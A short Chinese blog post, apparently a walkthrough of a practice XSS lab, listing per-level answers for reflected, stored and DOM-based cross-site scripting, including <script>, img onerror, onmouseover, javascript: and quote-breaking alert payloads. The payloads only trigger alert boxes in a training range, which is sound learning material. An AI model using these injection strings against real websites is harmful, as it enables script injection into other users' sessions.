zoukankan      html  css  js  c++  java

  • xss_靶场题目测试

    第一题:反射性xss(get)

     

    输出的字符出现在url中

    第二题:反射性xss(post)

    登录后输入<script>alert(1)</script>

    第三题:存储型xss

    输入<img src=http://1.html onerror=alert(1)>

    第四,五题:domxss:

    输入:'><img src="#" onmouseover="alert('xss')">

     

     

    第七题:

    输入:<img src=0+onerror="alert(123)">

    第八题:xss之htmlspecialchars
    审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中

    输入:javascript:alert(1)

    第九题:xss之href输出

    第十题:

    输入:';alert(1)//

     
  • 相关阅读:
    安装Hive2及配置HiveSever2
    sqoop语句
    Sqoop配置
    IO流的概述
    List集合的简单使用
    包装类
    访问权限修饰符
    接口
    抽象类
    final关键字
  • 原文地址:https://www.cnblogs.com/wenyoudo/p/14323870.html
Copyright © 2011-2022 走看看